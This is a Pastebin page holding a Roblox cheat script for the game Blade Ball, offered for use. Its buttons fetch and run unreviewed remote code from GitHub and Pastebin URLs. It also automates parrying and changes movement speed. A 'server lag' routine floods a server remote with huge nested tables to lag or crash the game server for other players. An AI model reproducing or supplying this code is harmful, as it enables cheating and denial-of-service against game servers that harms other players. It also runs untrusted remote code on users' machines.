Advertisement
SumitScripts

Title failed to load try again.?

Mar 10th, 2024 (edited)
107,771
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 9.44 KB | None | 0 0
  1. wait(1.2)
  2.  
  3. game.StarterGui:SetCore("SendNotification", {
  4.  
  5. Title = "Welcome"; -- the title (ofc)
  6.  
  7. Text = "Script Made By SumitScripts"; -- what the text says (ofc)
  8.  
  9. Icon = ""; -- the image if u want.
  10.  
  11. Duration = 5; -- how long the notification should in secounds
  12.  
  13. })
  14.  
  15.  
  16. local lib = loadstring(game:HttpGet("https://raw.githubusercontent.com/acsu123/HOHO_H/main/hoho_lib.lua", true))()
  17. local win = lib:Window("Script Made by SumitScripts","Blade Ball (OP)",Color3.new(0.333333, 0.666667, 1))
  18. local tab = win:Tab("Main")
  19. local label = tab:Label("Label", properties) --properties: {["Visible"] = flase}
  20. label:NewLabel("OP Win Every Game easily", properties)
  21.  
  22. tab:Line()
  23. tab:Button("Auto OP Parry", function()
  24. getgenv().config = getgenv().config or {
  25. hit_time = 0.5, -- // recommended 0.25 to 0.75 \ --
  26.  
  27. mode = 'Always', -- // Hold , Toggle , Always \ --
  28. deflect_type = 'Remote', -- // Key Press , Remote \ --
  29. notifications = true,
  30. keybind = Enum.KeyCode.V
  31. }
  32.  
  33. loadstring(game:HttpGet("https://raw.githubusercontent.com/Hosvile/Refinement/main/MC%3ABlade%20Ball%20Parry%20V4.0.0",true))()
  34. print("clicked")
  35. end)
  36.  
  37. tab:Line()
  38. tab:Button("Hold to Parry", function()
  39. getgenv().SpamSpeed = 1
  40. loadstring(game:HttpGet("https://raw.githubusercontent.com/Hosvile/Refinement/main/MC%3ABlade%20Ball%20Spam",true))()
  41. print("clicked")
  42. end)
  43.  
  44. tab:Line()
  45. tab:Button("Auto Clicker", function()
  46. local gui, frame, button = Instance.new("ScreenGui", game.CoreGui), Instance.new("Frame"), Instance.new("TextButton")
  47. gui.ResetOnSpawn = false
  48. frame.Size, frame.Position, frame.BackgroundColor3, frame.BorderSizePixel, frame.Active, frame.Draggable, frame.Parent = UDim2.new(0, 150, 0, 75), UDim2.new(0, 10, 0, 10), Color3.new(0, 0, 0), 0, true, true, gui
  49. button.Text, button.Size, button.Position, button.BackgroundColor3, button.BorderColor3, button.BorderSizePixel, button.Font, button.TextColor3, button.TextSize, button.Parent = "Manual spam", UDim2.new(1, -20, 1, -20), UDim2.new(0, 10, 0, 10), Color3.new(0, 0, 0), Color3.new(), 2, Enum.Font.SourceSans, Color3.new(1, 1, 1), 16, frame
  50.  
  51. local activated = false
  52.  
  53. local function toggle()
  54. activated, button.Text = not activated, activated and "Off" or "On"
  55.  
  56. while activated do
  57. local args = {1.5, CFrame.new(-254.29, 112.14, -119.27) * CFrame.Angles(-2.03, 0.57, 2.31), {["2617721424"] = Vector3.new(-273.40, -724.80, -20.92)}, {910, 154}}
  58. game:GetService("ReplicatedStorage").Remotes.ParryAttempt:FireServer(unpack(args))
  59. game:GetService("RunService").Heartbeat:Wait()
  60. button.BorderColor3 = Color3.new(math.random(), math.random(), math.random())
  61. end
  62. end
  63.  
  64. local function showNotification()
  65. game.StarterGui:SetCore("SendNotification", {Title = "Manual Spam", Text = "Made By SumitScripts", Duration = 5})
  66. end
  67.  
  68. button.MouseButton1Click:Connect(function()
  69. toggle()
  70. showNotification()
  71. end)
  72. print("clicked")
  73. end)
  74.  
  75. tab:Line()
  76. tab:Button("Auto Fram", function()
  77. loadstring(game:HttpGet("https://raw.githubusercontent.com/kmmwhocare/Crazzy-Hub/main/Blade%20Ball"))()
  78. print("clicked")
  79. end)
  80.  
  81. tab:Line()
  82. tab:Button("unlock abilities", function()
  83. loadstring(game:HttpGet("https://pastebin.com/raw/hV0p40Fv"))()
  84. print("clicked")
  85. end)
  86.  
  87. tab:Line()
  88. tab:Button("Blade ball OP Hub V2", function()
  89. loadstring(game:HttpGet("https://raw.githubusercontent.com/datshort1/datmodhub/main/Main"))()
  90. print("clicked")
  91. end)
  92.  
  93. local tab = win:Tab("Movement")
  94. local label = tab:Label("Label", properties) --properties: {["Visible"] = flase}
  95. label:NewLabel("OP SPRED", properties)
  96.  
  97. tab:Line()
  98. tab:Button("Speed", function()
  99. -- Variables
  100. local speedValue = 16 -- Default speed value
  101.  
  102. -- Create GUI
  103. local gui = Instance.new("ScreenGui")
  104. gui.Name = "JN HH Gaming"
  105. gui.Parent = game.Players.LocalPlayer.PlayerGui
  106.  
  107. local frame = Instance.new("Frame")
  108. frame.Name = "SpeedFrame"
  109. frame.Size = UDim2.new(0, 200, 0, 100)
  110. frame.Position = UDim2.new(0, 10, 0, 10)
  111. frame.BackgroundColor3 = Color3.new(0, 0, 0)
  112. frame.BackgroundTransparency = 0.5
  113. frame.Parent = gui
  114.  
  115. local speedLabel = Instance.new("TextLabel")
  116. speedLabel.Name = "SpeedLabel"
  117. speedLabel.Size = UDim2.new(0, 180, 0, 30)
  118. speedLabel.Position = UDim2.new(0, 10, 0, 10)
  119. speedLabel.BackgroundColor3 = Color3.new(0, 0, 0)
  120. speedLabel.TextColor3 = Color3.new(1, 1, 1)
  121. speedLabel.TextSize = 18
  122. speedLabel.Text = "Speed: " .. speedValue
  123. speedLabel.Parent = frame
  124.  
  125. local decreaseButton = Instance.new("TextButton")
  126. decreaseButton.Name = "DecreaseButton"
  127. decreaseButton.Size = UDim2.new(0, 50, 0, 30)
  128. decreaseButton.Position = UDim2.new(0, 10, 0, 50)
  129. decreaseButton.BackgroundColor3 = Color3.new(0, 1, 0)
  130. decreaseButton.TextColor3 = Color3.new(1, 1, 1)
  131. decreaseButton.TextSize = 14
  132. decreaseButton.Text = "-"
  133. decreaseButton.Parent = frame
  134.  
  135. local increaseButton = Instance.new("TextButton")
  136. increaseButton.Name = "IncreaseButton"
  137. increaseButton.Size = UDim2.new(0, 50, 0, 30)
  138. increaseButton.Position = UDim2.new(0, 140, 0, 50)
  139. increaseButton.BackgroundColor3 = Color3.new(0, 1, 0)
  140. increaseButton.TextColor3 = Color3.new(1, 1, 1)
  141. increaseButton.TextSize = 14
  142. increaseButton.Text = "+"
  143. increaseButton.Parent = frame
  144.  
  145. -- Functions
  146. local function updateSpeedLabel()
  147. speedLabel.Text = "Speed: " .. speedValue
  148. end
  149.  
  150. local function decreaseSpeed()
  151. if speedValue > 1 then
  152. speedValue = speedValue - 1
  153. updateSpeedLabel()
  154. end
  155. end
  156.  
  157. local function increaseSpeed()
  158. speedValue = speedValue + 1
  159. updateSpeedLabel()
  160. end
  161.  
  162. local function onDecreaseButtonClicked()
  163. decreaseSpeed()
  164. end
  165.  
  166. local function onIncreaseButtonClicked()
  167. increaseSpeed()
  168. end
  169.  
  170. -- Event connections
  171. decreaseButton.MouseButton1Click:Connect(onDecreaseButtonClicked)
  172. increaseButton.MouseButton1Click:Connect(onIncreaseButtonClicked)
  173.  
  174. -- Main loop
  175. while true do
  176. -- Modify the speed of the character (you need to replace this with the appropriate code for your specific game)
  177. game.Players.LocalPlayer.Character.Humanoid.WalkSpeed = speedValue
  178. wait(0.1) -- Adjust the wait time as desired
  179. end
  180. print("clicked")
  181. end)
  182.  
  183. tab:Line()
  184. tab:Button("infjump", function()
  185. --script made by Youtube: MrGabbe. Discord: Mr_G_Curry #6982
  186. local infjmp = true
  187. game:GetService("UserInputService").jumpRequest:Connect(function()
  188. if infjmp then
  189. game:GetService"Players".LocalPlayer.Character:FindFirstChildOfClass"Humanoid":ChangeState("Jumping")
  190. end
  191. end)
  192. print("clicked")
  193. end)
  194.  
  195. tab:Line()
  196. tab:Button("fly v3", function()
  197. loadstring(game:HttpGet("https://raw.githubusercontent.com/XNEOFF/FlyGuiV3/main/FlyGuiV3.txt"))()
  198. print("clicked")
  199. end)
  200.  
  201. tab:Line()
  202. tab:Button("fps booster", function()
  203. -- Made by RIP#6666
  204. _G.Settings = {
  205. Players = {
  206. ["Ignore Me"] = true, -- Ignore your Character
  207. ["Ignore Others"] = true -- Ignore other Characters
  208. },
  209. Meshes = {
  210. Destroy = false, -- Destroy Meshes
  211. LowDetail = true -- Low detail meshes (NOT SURE IT DOES ANYTHING)
  212. },
  213. Images = {
  214. Invisible = true, -- Invisible Images
  215. LowDetail = false, -- Low detail images (NOT SURE IT DOES ANYTHING)
  216. Destroy = false, -- Destroy Images
  217. },
  218. ["No Particles"] = true, -- Disables all ParticleEmitter, Trail, Smoke, Fire and Sparkles
  219. ["No Camera Effects"] = true, -- Disables all PostEffect's (Camera/Lighting Effects)
  220. ["No Explosions"] = true, -- Makes Explosion's invisible
  221. ["No Clothes"] = true, -- Removes Clothing from the game
  222. ["Low Water Graphics"] = true, -- Removes Water Quality
  223. ["No Shadows"] = true, -- Remove Shadows
  224. ["Low Rendering"] = true, -- Lower Rendering
  225. ["Low Quality Parts"] = true -- Lower quality parts
  226. }
  227. loadstring(game:HttpGet("https://raw.githubusercontent.com/CasperFlyModz/discord.gg-rips/main/FPSBooster.lua"))()
  228. print("clicked")
  229. end)
  230.  
  231. local tab = win:Tab("Mics")
  232. local label = tab:Label("Label", properties) --properties: {["Visible"] = flase}
  233. label:NewLabel("More Script Maybe Support your win", properties)
  234.  
  235. tab:Line()
  236. tab:Button("server lag v2", function()
  237. local char = game:GetService('Players').LocalPlayer.Character or nil
  238. if char then
  239. char.HumanoidRootPart.CFrame = CFrame.new(0,9e9,0)
  240. task.wait(0.5)
  241. char.HumanoidRootPart.Anchored = true
  242. end
  243. while wait(1.5) do --// don't change it's the best
  244. game:GetService("NetworkClient"):SetOutgoingKBPSLimit(math.huge)
  245. local function getmaxvalue(val)
  246. local mainvalueifonetable = 499999
  247. if type(val) ~= "number" then
  248. return nil
  249. end
  250. local calculateperfectval = (mainvalueifonetable/(val+2))
  251. return calculateperfectval
  252. end
  253.  
  254. local function bomb(tableincrease, tries)
  255. local maintable = {}
  256. local spammedtable = {}
  257.  
  258. table.insert(spammedtable, {})
  259. z = spammedtable[1]
  260.  
  261. for i = 1, tableincrease do
  262. local tableins = {}
  263. table.insert(z, tableins)
  264. z = tableins
  265. end
  266.  
  267. local calculatemax = getmaxvalue(tableincrease)
  268. local maximum
  269.  
  270. if calculatemax then
  271. maximum = calculatemax
  272. else
  273. maximum = 999999
  274. end
  275.  
  276. for i = 1, maximum do
  277. table.insert(maintable, spammedtable)
  278. end
  279.  
  280. for i = 1, tries do
  281. game.RobloxReplicatedStorage.SetPlayerBlockList:FireServer(maintable)
  282. end
  283. end
  284.  
  285. bomb(289, 5) --// change values if client crashes
  286. end
  287. print("clicked")
  288. end)
  289.  
  290. tab:Line()
  291. tab:Button("infinity Yield", function()
  292. --Press ; to type in a command
  293. loadstring(game:HttpGet(('https://raw.githubusercontent.com/EdgeIY/infiniteyield/master/source'),true))()
  294. print("clicked")
  295. end)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement